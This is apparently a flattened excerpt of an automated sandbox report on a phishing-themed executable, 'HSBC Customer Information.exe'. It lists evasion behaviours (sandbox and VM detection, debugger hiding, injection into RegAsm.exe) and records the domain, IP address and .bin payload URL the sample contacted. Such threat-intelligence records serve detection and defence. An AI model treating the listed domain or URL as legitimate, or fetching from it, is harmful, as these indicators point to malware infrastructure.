behaviorgraph top1 signatures2 2 Behavior Graph ID: 483511 Sample: HSBC Customer Information.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 18 Potential malicious icon found 2->18 20 Found malware configuration 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 6 other signatures 2->24 7 HSBC Customer Information.exe 2->7         started        process3 signatures4 26 Writes to foreign memory regions 7->26 28 Tries to detect Any.run 7->28 30 Hides threads from debuggers 7->30 10 RegAsm.exe 9 7->10         started        process5 dnsIp6 16 qrextechnologies.com 109.71.254.175, 443, 49791 LINSERVERSNL Germany 10->16 32 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->32 34 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->34 36 Tries to detect Any.run 10->36 38 Hides threads from debuggers 10->38 14 conhost.exe 10->14         started        signatures7 process8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.71.254.175
 qrextechnologies.com Germany
207778 LINSERVERSNL true

Contacted Domains

Name IP Active
qrextechnologies.com 109.71.254.175 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://qrextechnologies.com/barrr09_HVPbNJre68.bin false
  • Avira URL Cloud: safe
 unknown